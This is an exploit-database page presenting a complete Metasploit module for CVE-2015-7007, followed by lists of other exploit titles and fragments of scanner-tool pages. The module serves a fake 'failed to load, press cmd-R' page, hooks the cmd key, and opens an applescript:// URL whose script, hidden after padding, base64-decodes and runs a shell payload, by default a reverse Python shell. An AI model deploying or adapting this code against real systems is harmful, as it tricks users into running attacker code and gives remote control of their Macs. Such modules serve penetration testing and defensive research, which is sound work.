Menu

Search for hundreds of thousands of exploits

"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

osx

Release date

Exploit published date

2015-10-26

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
      'Description'    => %q{
        In versions of Mac OS X before 10.11.1, the applescript:// URL
        scheme is provided, which opens the provided script in the Applescript
        Editor. Pressing cmd-R in the Editor executes the code without any
        additional confirmation from the user. By getting the user to press
        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
        can be tricked into running arbitrary Applescript code.

        Gatekeeper should be disabled from Security & Privacy in order to
        avoid the unidentified Developer prompt.
      },
      'License'         => MSF_LICENSE,
      'Arch'            => ARCH_CMD,
      'Platform'        => ['unix', 'osx'],
      'Compat'          =>
        {
          'PayloadType' => 'cmd'
        },
      'Targets'         =>
        [
          [ 'Mac OS X', {} ]
        ],
      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Oct 16 2015',
      'Author'          => [ 'joev' ],
      'References'     =>
        [
          [ 'CVE', '2015-7007' ],
          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
        ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::Match::MAC_OSX
      }
    ))

    register_options([
      OptString.new('CONTENT', [false, "Content to display in browser",
        "This page has failed to load. Press cmd-R to refresh."]),
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ], self.class)
  end

  def on_request_exploit(cli, request, profile)
    print_status("Sending #{self.name}")
    send_response_html(cli, exploit_html)
  end

  def exploit_html
    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
  end

  def exploit_js
    js_obfuscate %Q|
      var as = Array(150).join("\\n") +
        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
      window.onkeydown = function(e) {
        if (e.keyCode == 91) {
          window.location = url;
        }
      };
    |
  end

  def sh
    'killall "Script Editor"; nohup ' + payload.encoded
  end

  def content
    datastore['CONTENT']
  end


end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2017-08-09 "NoMachine 5.3.9 - Local Privilege Escalation" local osx "Daniele Linguaglossa"
2017-07-15 "Apple Mac OS X + Safari - Local Javascript Quarantine Bypass" local osx "Filippo Cavallarin"
2017-05-01 "HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation" local osx "Han Sahin"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-02-01 "Apple WebKit - 'HTMLFormElement::reset()' Use-After Free" dos osx "Google Security Research"
2017-01-23 "Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution" local osx "Filippo Cavallarin"
2017-01-10 "Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic" dos osx "Brandon Azad"
2016-12-16 "Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service" dos osx LiquidWorm
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
Release Date Title Type Platform Author
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected